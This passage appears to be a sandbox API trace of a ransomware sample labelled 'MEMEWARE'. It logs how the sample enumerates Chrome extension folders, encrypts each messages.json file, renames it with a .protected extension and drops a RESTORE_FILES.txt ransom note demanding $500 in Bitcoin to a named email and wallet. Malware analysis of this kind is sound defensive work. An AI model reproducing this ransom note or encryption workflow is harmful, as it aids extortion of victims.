nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.101] CloseHandle (hObject=0x168) returned 1 [0080.101] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json.protected") returned 165 [0080.101] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json.protected")) returned 1 [0080.102] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.102] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.102] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\RESTORE_FILES.txt") returned 159 [0080.102] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.102] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.102] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.103] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.103] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.103] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.103] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.103] CloseHandle (hObject=0x164) returned 1 [0080.103] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.103] lstrcmpiW (lpString1="ko", lpString2="Windows") returned -1 [0080.103] lstrcmpiW (lpString1="ko", lpString2="Program Files") returned -1 [0080.103] lstrcmpiW (lpString1="ko", lpString2="Program Files (x86)") returned -1 [0080.103] lstrcmpiW (lpString1="ko", lpString2="$Recycle.bin") returned 1 [0080.103] lstrcmpiW (lpString1="ko", lpString2="System Volume Information") returned -1 [0080.103] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko") returned 141 [0080.103] lstrcmpW (lpString1="ko", lpString2=".") returned 1 [0080.103] lstrcmpW (lpString1="ko", lpString2="..") returned 1 [0080.104] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\*") returned 143 [0080.104] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.104] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.104] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.104] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.104] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.104] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.104] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\.") returned 143 [0080.104] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.104] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.104] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.104] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.104] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.104] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.104] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.104] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\..") returned 144 [0080.104] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.104] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.104] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.104] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.104] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.104] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.104] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.104] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.104] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json") returned 155 [0080.104] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.104] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.104] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.104] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.104] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.105] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json") returned 155 [0080.105] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.105] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json") returned 155 [0080.105] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.105] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json") returned 155 [0080.105] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.105] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xe0, lpOverlapped=0x0) returned 1 [0080.106] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.106] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xe0, lpOverlapped=0x0) returned 1 [0080.106] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.106] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.106] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.106] CloseHandle (hObject=0x168) returned 1 [0080.106] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json.protected") returned 165 [0080.106] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json.protected")) returned 1 [0080.107] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.107] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.107] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\RESTORE_FILES.txt") returned 159 [0080.107] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.107] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.107] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.108] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.108] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.108] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.108] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.108] CloseHandle (hObject=0x164) returned 1 [0080.108] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.108] lstrcmpiW (lpString1="lt", lpString2="Windows") returned -1 [0080.108] lstrcmpiW (lpString1="lt", lpString2="Program Files") returned -1 [0080.108] lstrcmpiW (lpString1="lt", lpString2="Program Files (x86)") returned -1 [0080.108] lstrcmpiW (lpString1="lt", lpString2="$Recycle.bin") returned 1 [0080.108] lstrcmpiW (lpString1="lt", lpString2="System Volume Information") returned -1 [0080.108] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt") returned 141 [0080.108] lstrcmpW (lpString1="lt", lpString2=".") returned 1 [0080.108] lstrcmpW (lpString1="lt", lpString2="..") returned 1 [0080.108] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\*") returned 143 [0080.108] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.108] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.109] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.109] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.109] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.109] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.109] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\.") returned 143 [0080.109] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.109] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.109] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.109] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.109] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.109] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.109] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.109] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\..") returned 144 [0080.109] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.109] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.109] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.109] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.109] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.109] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.109] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.109] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.109] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json") returned 155 [0080.109] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.109] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.109] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.109] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.109] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.110] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json") returned 155 [0080.110] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.110] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json") returned 155 [0080.110] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.110] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json") returned 155 [0080.110] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.110] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xeb, lpOverlapped=0x0) returned 1 [0080.111] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff15, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.111] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xeb, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xeb, lpOverlapped=0x0) returned 1 [0080.111] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.111] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.111] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.111] CloseHandle (hObject=0x168) returned 1 [0080.111] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json.protected") returned 165 [0080.111] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 